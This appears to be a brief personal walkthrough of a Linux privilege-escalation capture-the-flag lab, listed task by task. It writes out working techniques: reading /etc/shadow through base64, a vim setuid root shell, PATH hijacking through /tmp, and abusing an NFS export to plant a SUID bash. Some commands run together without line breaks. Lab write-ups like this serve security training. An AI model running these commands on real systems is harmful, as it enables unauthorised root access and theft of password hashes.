Linux Privilege Escalation
January 08, 2024
Task 1
Task 2
Task 3
Task 4
Task 5
Task 6
sudo -l
sudo nmap --interactiveTask 7
base64 /etc/shadow | base 64 --decode
base64 "/home/ubuntu/flag3.txt" | base64 --decode
Task 8
Just use this command to see the capabilities that can be use to suid
getcap -r / 2>/dev/null./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' Task 9 - Crontab
Change the content on the file that runs on crontab
Get the password hash from the /etc/shadow
Task 10
Find writable folders with this command
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -uDisplay the PATH to see the folder that has executable files
echo $PATHMake a executable file that has /bin/bash in it
cd /tmp
echo "/bin/bash" > thm
chmod 777 thm
export PATH=/tmp:$PATH
There is a executable ./test file that will run the ./thm command from the /tmp/thm that has /bin/bash
This test file is suid file
Task 11
cat /etc/exports
From the attacker machine use this command
showmount -e 10.10.173.235
mkdir /tmp/attacker
sudo mount -o rw 10.10.166.100:/tmp /tmp/attacker
After you mount the /tmp to the attacker machine we will now copy the /bin/bash to the /tmp from the victim machine
cd /tmp
cp /bin/bash bash
then use these commands to change the owner of that file and make it suid and executable
sudo chown root:root bash
sudo chmod +sx bash
then just run the command
./bash -p
Task 12
First ssh to leonard user then find the suid, after that use base64
find / -perm -u=s -type f 2>/dev/nullbase64 /etc/shadow | base64 -d
Get the password hash then use john
Then ssh to view the flag1
After that use sudo -l to view the sudo commands that the user can use
We now own the box
Last updated